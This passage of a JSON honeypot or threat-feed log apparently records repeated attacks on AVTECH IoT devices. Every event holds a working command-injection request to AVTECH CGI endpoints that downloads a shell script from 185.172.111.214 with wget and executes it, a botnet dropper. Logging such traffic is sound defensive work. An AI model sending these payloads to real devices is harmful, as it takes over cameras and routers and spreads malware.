- "first_seen": "2020-05-31T22:18:59Z",
- "last_seen": "2020-05-31T22:18:59Z"
- },
- {
- "event_id": "09b4d953a8c2c359d5e7c8ec442459cb7f060389aa480675dd700e930467aacc",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:18:59Z",
- "last_seen": "2020-05-31T22:18:59Z"
- },
- {
- "event_id": "13e4953ba65621eede2422b1443ba73fffe4b7c49ef4f493cfa2e5881619aec9",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:18:57Z",
- "last_seen": "2020-05-31T22:18:57Z"
- },
- {
- "event_id": "c16c984b9847c43eb3f95169cf3d440a59f99fb1802d09e4afb9efe121fbd94c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:18:56Z",
- "last_seen": "2020-05-31T22:18:56Z"
- },
- {
- "event_id": "4da5f0ebeb3bab363c6115a19002234fc85ce0a7d05a156282d2788d17d7e3b3",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:18:53Z",
- "last_seen": "2020-05-31T22:18:53Z"
- },
- {
- "event_id": "5ba382e0fff1fa8862d5b668a799c0925a08407bee58f4aa22de509644c1d17c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:18:32Z",
- "last_seen": "2020-05-31T22:18:32Z"
- },
- {
- "event_id": "e7b440e5a5951210ffbaa23c70a72840a15dd87ce03d065eb0340fad311a4f93",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:18:30Z",
- "last_seen": "2020-05-31T22:18:30Z"
- },
- {
- "event_id": "f2ca870107be30b15d44bd315f7d3b66333f9276659ed25bca7f8900d05362ab",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:59:11Z",
- "last_seen": "2020-05-31T21:59:11Z"
- },
- {
- "event_id": "2f9f9802964b01eff8176aa2fd2b906704903c7e021969e6316d7b55fd1588ac",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8181,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:59:10Z",
- "last_seen": "2020-05-31T21:59:10Z"
- },
- {
- "event_id": "dbc10d11b196132a1bf54426871705311db32df69da5b65f0db6ce9b20cecd18",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 2087,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:59:05Z",
- "last_seen": "2020-05-31T21:59:05Z"
- },
- {
- "event_id": "90808b9dd3c6dbf54b46422cf5b6c3e0316fc574ee6d17076b7018a200cc170c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2087,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:59:02Z",
- "last_seen": "2020-05-31T21:59:02Z"
- },
- {
- "event_id": "6562a07d2a002582fdc9a0b91bc4f8e6538a44d1fa3d8d0409d39bee73c7906a",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 37215,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:58:43Z",
- "last_seen": "2020-05-31T21:58:43Z"
- },
- {
- "event_id": "181ecbae2164c235e36f958f61218c3d63df97a46a73dcc97e7d4bcf18240869",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 37215,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:58:41Z",
- "last_seen": "2020-05-31T21:58:41Z"
- },
- {
- "event_id": "75d81aa189951f92848a7b6573f8f36855b0d97949fc0c8e65ed3432e979a306",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8139,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:56:01Z",
- "last_seen": "2020-05-31T21:56:01Z"
- },
- {
- "event_id": "5cbbf97cd31bb9bd5672d74e1305d56d1a78dd4fa7a74462c6339f95e1a96af0",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:56:00Z",
- "last_seen": "2020-05-31T21:56:00Z"
- },
- {
- "event_id": "7db7c17e104fc685e9e7e7b83f6d22027acc8316fa606f33380949795b5d3c8d",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8139,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:55:59Z",
- "last_seen": "2020-05-31T21:55:59Z"
- },
- {
- "event_id": "bf53abb35a930c0bce99d57cd7bcfec0190b74c04c5fb943b1dbe8dcf4925117",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:55:56Z",
- "last_seen": "2020-05-31T21:55:56Z"
- },
- {
- "event_id": "b815fa5c04e3e6e2019d640ea71060cea7a2d3f8cbc96ead18450288981bd4ef",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:55:54Z",
- "last_seen": "2020-05-31T21:55:54Z"
- },
- {
- "event_id": "852fb0a5125f23602ff609902707a770f4a3ac7acb9bcfde434c2e2c98a34ecf",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:55:52Z",
- "last_seen": "2020-05-31T21:55:52Z"
- },
- {
- "event_id": "ed7ec6ac5eaf61dbd50ac7b11e2db74287bfdcc8519492fb044a309dcad2fb5c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:55:51Z",
- "last_seen": "2020-05-31T21:55:51Z"
- },
- {
- "event_id": "0d564eb754bd05f078a20e191ac21e3cf41b52484bf749d611024a91473a6abf",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:55:50Z",
- "last_seen": "2020-05-31T21:55:50Z"
- },
- {
- "event_id": "3c4aae7c0e05c1e9892fcc2cb2495a4ead1734694554e4bc2cc6f9d4bae676b6",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:55:49Z",
- "last_seen": "2020-05-31T21:55:49Z"
- },
- {
- "event_id": "19421c47dfa0a83a2ebacd0342bd6dd04c11e12ae883e299d9ccfa4df07fb623",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:55:28Z",
- "last_seen": "2020-05-31T21:55:28Z"
- },
- {
- "event_id": "47f23b7c510f1fe373d7399cbc914c8b49a24d6ffe1827b902fdaef6f5d2738d",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:55:26Z",
- "last_seen": "2020-05-31T21:55:26Z"
- },
- {
- "event_id": "e1e6e639a1be0c847c302b1bdd9d3912436cfe49d90869ee63dcb48c30214b2c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:55:19Z",
- "last_seen": "2020-05-31T21:55:19Z"
- },
- {
- "event_id": "579e4ff90df0250b084c2825c4abc94f567f1c7e133767f9992672c9eadc9aba",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 40.8UsA.sh; chmod 777 40.8UsA.sh; sh 40.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T21:55:17Z",
- "last_seen": "2020-05-31T21:55:17Z"
- }
- ]
- }
Add Comment
Please, Sign In to add comment